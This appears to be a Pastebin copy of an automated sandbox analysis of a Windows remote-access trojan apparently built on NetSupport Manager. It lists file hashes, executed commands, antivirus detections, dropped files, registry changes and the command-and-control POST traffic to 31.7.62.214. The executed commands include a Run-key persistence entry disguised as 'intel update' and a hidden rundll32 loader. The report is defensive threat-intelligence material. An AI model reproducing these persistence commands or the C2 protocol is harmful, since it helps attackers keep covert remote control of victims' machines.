Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Rat"
- * MalScore: 10.0
- * File Name: "rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe"
- * File Size: 4103904
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "eb34fd049fc0385afb654ba7b85268ac59885c10076e14c3056d02b7dec7856e"
- * MD5: "1e7571ae1a9d89f497b6fa02d6da31a4"
- * SHA1: "3580685f70b7f1d09c91a749e6b58008a742565a"
- * SHA512: "51040f5d096b8b0e2be6f23dbe5cdbae035b70e46dae7889ff9cf87cfa05a27d0a65e2e8d1ece5e5b6063b683667a5bd2ac9a59a84547c4dc5afb31b1faa9293"
- * CRC32: "EE8385FE"
- * SSDEEP: "98304:PX4wNtzCLCCjiFEM+nN81WRF/8Jbucyazx1X:vdNt6eUvRF/WucyaL"
- * Process Execution:
- "rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe",
- "rat_1e7571ae1a9d89f497b6fa02d6da31a4.tmp",
- "cmd.exe",
- "rundll32.exe",
- "cmd.exe",
- "taskhost1.exe",
- "timeout.exe",
- "reg.exe",
- "cmd.exe",
- "timeout.exe",
- "cmd.exe",
- "svchost.exe",
- "WmiPrvSE.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\is-8MNQC.tmp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.tmp\" /SL5=\"$11018E,3408738,721408,C:\\Users\\user\\AppData\\Local\\Temp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /c rundll32.exe %temp%\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.zip, PNWVMHPU",
- "\"C:\\Windows\\system32\\cmd.exe\" /C \"\"C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.bat\"\"",
- "rundll32.exe C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.zip, PNWVMHPU",
- "cmd.exe /c start %temp%\\taskhost1.exe&timeout -t 23® ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"intel update\" /t REG_SZ /F /D \"C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe\"",
- "cmd.exe /c timeout -t 10&del C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.zip /f",
- "C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe",
- "timeout -t 23",
- "C:\\Windows\\system32\\reg.exe REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"intel update\" /t REG_SZ /F /D \"C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe\"",
- "timeout -t 10",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\GetUserLang.exe\"",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details":
- "IP": "31.7.62.214:443"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe, PID 2736"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "taskhost1.exe tried to sleep 355 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe, pid: 2736, offset: 0x00340362, length: 0x00001a9a"
- "self_read": "process: rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe, pid: 2736, offset: 0x00341e47, length: 0x000a8099"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "rundll32.exe -> cmd.exe"
- "Process": "rundll32.exe -> cmd.exe"
- "Description": "File has been identified by 7 Antiviruses on VirusTotal as malicious",
- "Details":
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Kaspersky": "Backdoor.Win32.Agent.mytpla"
- "Avast": "Win32:TrojanX-gen Trj"
- "Microsoft": "Program:Win32/Unwaders.A!ml"
- "AVG": "Win32:TrojanX-gen Trj"
- "Qihoo-360": "HEUR/QVM05.1.200D.Malware.Gen"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\is-8MNQC.tmp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.tmp"
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm"
- "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm"
- "url": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\intel update"
- "data": "C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\client32.exe"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\HTCTL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\msvcr100.dll"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\nskbfltr.inf"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\NSM.ini"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\NSM.LIC"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\pcicapi.dll"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PCICHEK.DLL"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PCICL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\remcmdstub.exe"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\TCCTL32.DLL"
- * Started Service:
- * Mutexes:
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511",
- "Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000",
- "DefaultTabtip-MainUI"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-8MNQC.tmp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-N3OKS.tmp\\_isetup\\_setup64.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST2BR.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\LEIVMUBV4955.inf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\client32.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\client32.ini",
- "C:\\Users\\user\\AppData\\Local\\Temp\\HTCTL32.DLL",
- "C:\\Users\\user\\AppData\\Local\\Temp\\msvcr100.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nskbfltr.inf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\NSM.ini",
- "C:\\Users\\user\\AppData\\Local\\Temp\\NSM.LIC",
- "C:\\Users\\user\\AppData\\Local\\Temp\\pcicapi.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PCICHEK.DLL",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PCICL32.DLL",
- "C:\\Users\\user\\AppData\\Local\\Temp\\remcmdstub.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\TCCTL32.DLL",
- "C:\\Users\\user\\AppData\\Local\\Temp\\taskhost1.exe",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\WMIDataDevice",
- "\\??\\PIPE\\lsarpc",
- "\\??\\PIPE\\srvsvc"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-8MNQC.tmp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-8MNQC.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST2BR.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-N3OKS.tmp\\_isetup\\_setup64.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-N3OKS.tmp\\_isetup",
- "C:\\Users\\user\\AppData\\Local\\Temp\\is-N3OKS.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\client32.exe",
- "C:\\LEIVMUBV4955.inf",
- "C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\rat_1e7571ae1a9d89f497b6fa02d6da31a4.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\RLIIIDYONDRLIIIDYONDRLIIIDYOND.bat"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\intel update"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner"
- * DNS Communications:
- "type": "A",
- "request": "geo.netsupportsoftware.com",
- "answers":
- "data": "62.172.138.35",
- "type": "A"
- "data": "geograph.netsupportsoftware.com",
- "type": "CNAME"
- "data": "195.171.92.116",
- "type": "A"
- * Domains:
- "ip": "195.171.92.116",
- "domain": "geo.netsupportsoftware.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "CMD=POLL\nINFO=1\nACK=1\n",
- "uri": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "31.7.62.214",
- "version": "1.1",
- "path": "http://31.7.62.214/fakeurl.htm",
- "data": "POST http://31.7.62.214/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 31.7.62.214\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
- "port": 443
- "count": 1,
- "body": "",
- "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
- "user-agent": "",
- "method": "GET",
- "host": "geo.netsupportsoftware.com",
- "version": "1.1",
- "path": "/location/loca.asp",
- "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3b\\xb31\\xa3\\xf9/\\x88\\xd6g\\x94=J\\xc2\\xe6\\xbe\\x1eOU(\\x10\\xfb#\\x13\\xa8r\\xb7\\xdd:\\x86<\\xf4=n\\x1c\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "uri": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "31.7.62.214",
- "version": "1.1",
- "path": "http://31.7.62.214/fakeurl.htm",
- "data": "POST http://31.7.62.214/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 234\nHost: 31.7.62.214\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3b\\xb31\\xa3\\xf9/\\x88\\xd6g\\x94=J\\xc2\\xe6\\xbe\\x1eOU(\\x10\\xfb#\\x13\\xa8r\\xb7\\xdd:\\x86<\\xf4=n\\x1c\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "port": 443
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
- "uri": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "31.7.62.214",
- "version": "1.1",
- "path": "http://31.7.62.214/fakeurl.htm",
- "data": "POST http://31.7.62.214/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 76\nHost: 31.7.62.214\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
- "port": 443
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "uri": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "31.7.62.214",
- "version": "1.1",
- "path": "http://31.7.62.214/fakeurl.htm",
- "data": "POST http://31.7.62.214/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 31.7.62.214\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "port": 443
- "count": 7,
- "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "uri": "http://31.7.62.214:443/http://31.7.62.214/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "31.7.62.214",
- "version": "1.1",
- "path": "http://31.7.62.214/fakeurl.htm",
- "data": "POST http://31.7.62.214/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 31.7.62.214\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "port": 443
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment